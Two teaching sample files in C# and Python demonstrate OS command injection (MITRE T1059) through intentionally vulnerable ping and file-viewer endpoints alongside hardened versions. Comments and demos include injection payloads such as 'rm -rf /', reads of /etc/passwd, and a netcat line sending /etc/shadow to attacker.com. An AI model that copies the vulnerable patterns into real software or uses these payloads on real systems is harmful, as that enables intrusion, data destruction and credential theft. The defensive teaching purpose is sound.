File: samples/dotnet/CommandInjection.cs
using Microsoft.AspNetCore.Mvc;
using System.Diagnostics;
using System.Text.RegularExpressions;

namespace MitreAttackForDevs.Samples;

/// <summary>
/// Demonstrates T1059 - Command and Scripting Interpreter
/// Shows vulnerable command injection and secure alternatives
/// </summary>
public class CommandInjectionExamples
{
    #region VULNERABLE - DO NOT USE IN PRODUCTION

    /// <summary>
    /// VULNERABLE: T1059 - Command Injection
    /// This endpoint is vulnerable to command injection attacks.
    /// Example malicious input: "google.com && rm -rf /" or "google.com; cat /etc/passwd"
    /// </summary>
    [HttpGet("api/vulnerable/ping")]
    public IActionResult VulnerablePing([FromQuery] string host)
    {
        // DANGER: User input is passed directly to shell
        var processInfo = new ProcessStartInfo
        {
            FileName = "/bin/bash",  // or "cmd.exe" on Windows
            Arguments = $"-c \"ping -c 4 {host}\"",  // User input concatenated directly!
            RedirectStandardOutput = true,
            UseShellExecute = false
        };

        using var process = Process.Start(processInfo);
        using var reader = process.StandardOutput;
        var output = reader.ReadToEnd();
        process.WaitForExit();

        return new OkObjectResult(new { result = output });
    }

    /// <summary>
    /// VULNERABLE: Another common pattern - Using cmd.exe with string concatenation
    /// Vulnerable to: "example.com & whoami" or "example.com | type C:\passwords.txt"
    /// </summary>
    [HttpGet("api/vulnerable/ping-windows")]
    public IActionResult VulnerablePingWindows([FromQuery] string host)
    {
        // DANGER: Shell execution with user-controlled input
        var startInfo = new ProcessStartInfo
        {
            FileName = "cmd.exe",
            Arguments = $"/c ping -n 4 {host}",  // Command injection vulnerability!
            RedirectStandardOutput = true,
            UseShellExecute = false
        };

        using var process = Process.Start(startInfo);
        var output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();

        return new OkObjectResult(new { result = output });
    }

    #endregion

    #region DEFENDED - Secure Implementation

    /// <summary>
    /// DEFENDED: T1059 - Multiple layers of defense
    /// 1. Input validation with strict allowlist
    /// 2. No shell execution
    /// 3. Arguments passed as array (not string concatenation)
    /// 4. Timeout enforcement
    /// </summary>
    [HttpGet("api/secure/ping")]
    public async Task<IActionResult> SecurePing([FromQuery] string host)
    {
        // Defense Layer 1: Input Validation
        if (!IsValidHost(host))
        {
            return new BadRequestObjectResult(new 
            { 
                error = "Invalid host format",
                technique = "T1059 - Command Injection Prevention"
            });
        }

        // Defense Layer 2: Use allowlist of permitted commands
        var allowedCommands = new HashSet<string> { "ping" };
        var command = "ping";
        
        if (!allowedCommands.Contains(command))
        {
            return new BadRequestObjectResult(new { error = "Command not allowed" });
        }

        try
        {
            // Defense Layer 3: No shell execution, direct process invocation
            var processInfo = new ProcessStartInfo
            {
                FileName = OperatingSystem.IsWindows() ? "ping.exe" : "ping",
                
                // Defense Layer 4: Use ArgumentList instead of Arguments string
                // This prevents shell interpretation of special characters
                RedirectStandardOutput = true,
                RedirectStandardError = true,
                UseShellExecute = false,  // Critical: No shell interpretation
                CreateNoWindow = true
            };

            // Add arguments individually - prevents injection
            if (OperatingSystem.IsWindows())
            {
                processInfo.ArgumentList.Add("-n");
                processInfo.ArgumentList.Add("4");
            }
            else
            {
                processInfo.ArgumentList.Add("-c");
                processInfo.ArgumentList.Add("4");
            }
            processInfo.ArgumentList.Add(host);  // Even if malicious, it's just one argument

            using var process = Process.Start(processInfo);
            
            // Defense Layer 5: Timeout enforcement
            using var cts = new CancellationTokenSource(TimeSpan.FromSeconds(10));
            
            var outputTask = process.StandardOutput.ReadToEndAsync();
            var errorTask = process.StandardError.ReadToEndAsync();
            
            await process.WaitForExitAsync(cts.Token);
            
            var output = await outputTask;
            var error = await errorTask;

            // Defense Layer 6: Logging and monitoring
            if (process.ExitCode != 0)
            {
                // Log suspicious activity
                Console.WriteLine($"[SECURITY] Ping failed for host: {host}, Exit Code: {process.ExitCode}");
            }

            return new OkObjectResult(new 
            { 
                result = output,
                exitCode = process.ExitCode,
                technique = "T1059 - Defended with input validation and safe process execution"
            });
        }
        catch (OperationCanceledException)
        {
            return new StatusCodeResult(StatusCodes.Status408RequestTimeout);
        }
        catch (Exception ex)
        {
            // Defense Layer 7: Safe error handling - don't leak system information
            Console.WriteLine($"[SECURITY] Exception during ping: {ex.Message}");
            return new StatusCodeResult(StatusCodes.Status500InternalServerError);
        }
    }

    /// <summary>
    /// Validates host input using strict allowlist pattern
    /// Allows: domain names, IPv4, IPv6
    /// </summary>
    private bool IsValidHost(string host)
    {
        if (string.IsNullOrWhiteSpace(host) || host.Length > 253)
            return false;

        // Check for shell metacharacters that could be used for injection
        var dangerousChars = new[] { ';', '&', '|', '$', '`', '\n', '\r', '<', '>', '(', ')', '{', '}' };
        if (dangerousChars.Any(c => host.Contains(c)))
            return false;

        // Validate IPv4
        if (System.Net.IPAddress.TryParse(host, out var ip))
        {
            return ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork ||
                   ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetworkV6;
        }

        // Validate domain name (strict pattern)
        var domainPattern = @"^([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}$";
        return Regex.IsMatch(host, domainPattern);
    }

    #endregion

    #region Additional Defensive Utilities

    /// <summary>
    /// Alternative: Use a process wrapper with built-in security controls
    /// </summary>
    public class SecureProcessExecutor
    {
        private readonly HashSet<string> _allowedExecutables;
        private readonly TimeSpan _defaultTimeout;
        private readonly ILogger _logger;

        public SecureProcessExecutor(ILogger logger, TimeSpan? timeout = null)
        {
            _logger = logger;
            _defaultTimeout = timeout ?? TimeSpan.FromSeconds(30);
            
            // T1059 Defense: Strict allowlist of permitted executables
            _allowedExecutables = new HashSet<string>(StringComparer.OrdinalIgnoreCase)
            {
                "ping", "ping.exe",
                "nslookup", "nslookup.exe",
                "traceroute", "tracert.exe"
            };
        }

        public async Task<ProcessResult> ExecuteAsync(
            string executable, 
            IEnumerable<string> arguments, 
            CancellationToken cancellationToken = default)
        {
            // Validate executable is in allowlist
            if (!_allowedExecutables.Contains(Path.GetFileName(executable)))
            {
                _logger.LogWarning("[T1059] Blocked attempt to execute non-allowlisted command: {Executable}", executable);
                throw new SecurityException($"Executable not permitted: {executable}");
            }

            var startInfo = new ProcessStartInfo
            {
                FileName = executable,
                RedirectStandardOutput = true,
                RedirectStandardError = true,
                UseShellExecute = false,
                CreateNoWindow = true
            };

            // Add arguments safely
            foreach (var arg in arguments)
            {
                startInfo.ArgumentList.Add(arg);
            }

            using var process = Process.Start(startInfo);
            using var cts = CancellationTokenSource.CreateLinkedTokenSource(cancellationToken);
            cts.CancelAfter(_defaultTimeout);

            var outputTask = process.StandardOutput.ReadToEndAsync();
            var errorTask = process.StandardError.ReadToEndAsync();

            await process.WaitForExitAsync(cts.Token);

            return new ProcessResult
            {
                ExitCode = process.ExitCode,
                StandardOutput = await outputTask,
                StandardError = await errorTask
            };
        }
    }

    public record ProcessResult
    {
        public int ExitCode { get; init; }
        public string StandardOutput { get; init; } = string.Empty;
        public string StandardError { get; init; } = string.Empty;
    }

    #endregion
}

/// <summary>
/// Key Takeaways for T1059 Defense:
/// 
/// 1. NEVER concatenate user input into command strings
/// 2. NEVER use shell execution (UseShellExecute = false)
/// 3. ALWAYS use ArgumentList instead of Arguments property
/// 4. ALWAYS validate input with strict allowlist patterns
/// 5. ALWAYS use command allowlisting
/// 6. ALWAYS enforce timeouts
/// 7. ALWAYS log suspicious activity
/// 8. Consider using higher-level libraries instead of shell commands
/// 
/// References:
/// - MITRE ATT&CK T1059: https://attack.mitre.org/techniques/T1059/
/// - CWE-78: OS Command Injection
/// - OWASP: Command Injection
/// </summary>

File: samples/python/command_injection.py
"""
MITRE ATT&CK T1059 - Command and Scripting Interpreter: Command Injection

Command injection occurs when an application passes unsanitized user input 
to a system shell, allowing attackers to execute arbitrary commands.

This module demonstrates:
1. VULNERABLE code that allows command injection
2. DEFENDED code using proper subprocess handling and input validation

Educational purpose: Shows the risk of command injection and secure alternatives.
"""

import os
import subprocess
import shlex
import re
from typing import List, Optional


# =============================================================================
# VULNERABLE IMPLEMENTATION - DO NOT USE IN PRODUCTION
# =============================================================================

def vulnerable_ping(host: str) -> str:
    """
    ⚠️  VULNERABLE TO T1059 (Command Injection)
    
    This function demonstrates a common vulnerability where user input
    is directly passed to os.system() or shell=True in subprocess.
    
    Attack example:
        host = "8.8.8.8; cat /etc/passwd"
        This would ping 8.8.8.8 AND then execute "cat /etc/passwd"
    
    Args:
        host: IP address or hostname (UNSANITIZED USER INPUT)
        
    Returns:
        Command output
    """
    # VULNERABLE: User input directly in shell command
    command = f"ping -c 1 {host}"
    
    print(f"[VULNERABLE] Executing: {command}")
    
    # os.system() passes the entire command to a shell
    # This allows command chaining with ; | & and other shell metacharacters
    exit_code = os.system(command)
    
    return f"Command exited with code: {exit_code}"


def vulnerable_file_viewer(filename: str) -> str:
    """
    ⚠️  VULNERABLE TO T1059 (Command Injection)
    
    This simulates a web endpoint that displays file contents.
    Attacker can inject commands through the filename parameter.
    
    Attack example:
        filename = "file.txt; rm -rf /"
        filename = "file.txt | nc attacker.com 4444 < /etc/shadow"
    
    Args:
        filename: File to view (UNSANITIZED USER INPUT)
        
    Returns:
        File contents or command output
    """
    # VULNERABLE: Using subprocess with shell=True
    command = f"cat {filename}"
    
    print(f"[VULNERABLE] Executing: {command}")
    
    try:
        # shell=True is dangerous - it invokes a shell interpreter
        result = subprocess.run(
            command,
            shell=True,  # ⚠️  VULNERABLE!
            capture_output=True,
            text=True,
            timeout=5
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        return "Command timed out"


# =============================================================================
# DEFENDED IMPLEMENTATION - SECURE AGAINST T1059
# =============================================================================

def is_valid_ip_or_hostname(host: str) -> bool:
    """
    Validate that input is a legitimate IP address or hostname.
    
    Defense against T1059: Allowlisting valid input patterns.
    """
    # Pattern for IPv4 address
    ipv4_pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
    
    # Pattern for hostname (alphanumeric, dots, hyphens)
    hostname_pattern = r'^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$'
    
    if re.match(ipv4_pattern, host):
        # Validate each octet is 0-255
        octets = host.split('.')
        return all(0 <= int(octet) <= 255 for octet in octets)
    
    if re.match(hostname_pattern, host):
        # Additional checks for valid hostname
        if len(host) > 253 or '..' in host:
            return False
        return True
    
    return False


def defended_ping(host: str) -> str:
    """
    ✅ DEFENDED AGAINST T1059 (Command Injection)
    
    This function demonstrates secure command execution:
    1. Input validation (allowlisting)
    2. Using subprocess with argument list (no shell)
    3. No string interpolation in commands
    
    Args:
        host: IP address or hostname
        
    Returns:
        Command output or error message
    """
    # Defense 1: Validate input against allowlist
    if not is_valid_ip_or_hostname(host):
        return f"[DEFENDED] Invalid input: {host} (T1059 defense: input validation)"
    
    # Defense 2: Use subprocess with argument list, NOT shell=True
    # Each argument is passed separately, preventing command injection
    command = ["ping", "-c", "1", host]
    
    print(f"[DEFENDED] Executing: {command}")
    
    try:
        # shell=False (default) - arguments are NOT interpreted by shell
        result = subprocess.run(
            command,
            shell=False,  # ✅ SECURE - no shell interpretation
            capture_output=True,
            text=True,
            timeout=5
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        return "Command timed out"
    except subprocess.SubprocessError as e:
        return f"Error executing command: {e}"


def is_valid_filename(filename: str, allowed_directory: str = "/tmp") -> bool:
    """
    Validate filename to prevent directory traversal and command injection.
    
    Defense against T1059 and T1083 (File and Directory Discovery).
    """
    # Reject obvious shell metacharacters
    dangerous_chars = [';', '|', '&', '$', '`', '\n', '\r', '>', '<']
    if any(char in filename for char in dangerous_chars):
        return False
    
    # Reject path traversal attempts
    if '..' in filename or filename.startswith('/'):
        return False
    
    # Construct full path and verify it's within allowed directory
    try:
        full_path = os.path.realpath(os.path.join(allowed_directory, filename))
        allowed_path = os.path.realpath(allowed_directory)
        
        # Ensure the resolved path is within the allowed directory
        if not full_path.startswith(allowed_path):
            return False
        
        return True
    except (ValueError, OSError):
        return False


def defended_file_viewer(filename: str, allowed_directory: str = "/tmp") -> str:
    """
    ✅ DEFENDED AGAINST T1059 (Command Injection)
    
    This function demonstrates secure file access:
    1. Input validation and sanitization
    2. Path traversal prevention
    3. Using Python's built-in file operations (no shell commands)
    
    Args:
        filename: File to view
        allowed_directory: Base directory to restrict access
        
    Returns:
        File contents or error message
    """
    # Defense 1: Validate filename
    if not is_valid_filename(filename, allowed_directory):
        return f"[DEFENDED] Invalid filename: {filename} (T1059 defense: input validation)"
    
    # Defense 2: Use Python's built-in file operations, NOT subprocess
    full_path = os.path.join(allowed_directory, filename)
    
    print(f"[DEFENDED] Reading file: {full_path}")
    
    try:
        # Direct file access - no shell involved
        with open(full_path, 'r') as f:
            content = f.read(10000)  # Limit size
        return content
    except FileNotFoundError:
        return f"File not found: {filename}"
    except PermissionError:
        return f"Permission denied: {filename}"
    except Exception as e:
        return f"Error reading file: {e}"


# =============================================================================
# DEMONSTRATION AND TESTING
# =============================================================================

def demo_vulnerable_code():
    """Demonstrate how command injection works (T1059)."""
    print("\n" + "=" * 70)
    print("VULNERABLE CODE DEMONSTRATION (T1059)")
    print("=" * 70)
    
    print("\n1. Normal usage:")
    result = vulnerable_ping("8.8.8.8")
    print(f"Result: {result}\n")
    
    print("2. Command injection attack:")
    print("   Attacker input: '8.8.8.8; echo INJECTED_COMMAND'")
    # This would execute both ping AND the injected command
    malicious_input = "8.8.8.8; echo 'INJECTED_COMMAND - attacker could run: cat /etc/passwd'"
    result = vulnerable_ping(malicious_input)
    print(f"Result: {result}\n")
    
    print("3. File viewer command injection:")
    print("   Attacker input: 'file.txt; whoami'")
    malicious_input = "file.txt; echo 'INJECTED - attacker identity:' && whoami"
    result = vulnerable_file_viewer(malicious_input)
    print(f"Result: {result}\n")


def demo_defended_code():
    """Demonstrate secure implementation that blocks T1059."""
    print("\n" + "=" * 70)
    print("DEFENDED CODE DEMONSTRATION (T1059 Prevention)")
    print("=" * 70)
    
    print("\n1. Normal usage - allowed:")
    result = defended_ping("8.8.8.8")
    print(f"Result: {result[:100]}...\n")
    
    print("2. Command injection attempt - BLOCKED:")
    print("   Attacker input: '8.8.8.8; echo INJECTED'")
    malicious_input = "8.8.8.8; echo INJECTED"
    result = defended_ping(malicious_input)
    print(f"Result: {result}\n")
    
    print("3. Another injection attempt - BLOCKED:")
    print("   Attacker input: '8.8.8.8 | cat /etc/passwd'")
    malicious_input = "8.8.8.8 | cat /etc/passwd"
    result = defended_ping(malicious_input)
    print(f"Result: {result}\n")
    
    # Create a test file
    test_file = "/tmp/test_mitre_attack.txt"
    with open(test_file, 'w') as f:
        f.write("This is a test file for MITRE ATT&CK demo.")
    
    print("4. File viewer - normal usage:")
    result = defended_file_viewer("test_mitre_attack.txt", "/tmp")
    print(f"Result: {result}\n")
    
    print("5. File viewer - command injection attempt - BLOCKED:")
    print("   Attacker input: 'test.txt; cat /etc/passwd'")
    malicious_input = "test.txt; cat /etc/passwd"
    result = defended_file_viewer(malicious_input, "/tmp")
    print(f"Result: {result}\n")
    
    print("6. File viewer - path traversal attempt - BLOCKED:")
    print("   Attacker input: '../../etc/passwd'")
    malicious_input = "../../etc/passwd"
    result = defended_file_viewer(malicious_input, "/tmp")
    print(f"Result: {result}\n")
    
    # Cleanup
    try:
        os.remove(test_file)
    except:
        pass


if __name__ == "__main__":
    print("=" * 70)
    print("MITRE ATT&CK T1059 - Command Injection Demo")
    print("=" * 70)
    print("\nThis demo shows command injection vulnerabilities and defenses.")
    print("\nWARNING: The vulnerable examples are for educational purposes only!")
    
    # Show vulnerable code
    demo_vulnerable_code()
    
    # Show defended code
    demo_defended_code()
    
    # Summary
    print("=" * 70)
    print("KEY DEFENSES AGAINST T1059 (Command Injection):")
    print("=" * 70)
    print("1. ✅ Use subprocess with argument lists (shell=False)")
    print("2. ✅ Validate and sanitize ALL user input")
    print("3. ✅ Use allowlists for permitted characters/patterns")
    print("4. ✅ Avoid os.system() and shell=True")
    print("5. ✅ Use built-in language functions instead of shell commands")
    print("6. ✅ Apply principle of least privilege to command execution")
    print("7. ✅ Consider using safer alternatives (e.g., libraries vs. CLI tools)")
    print("=" * 70)
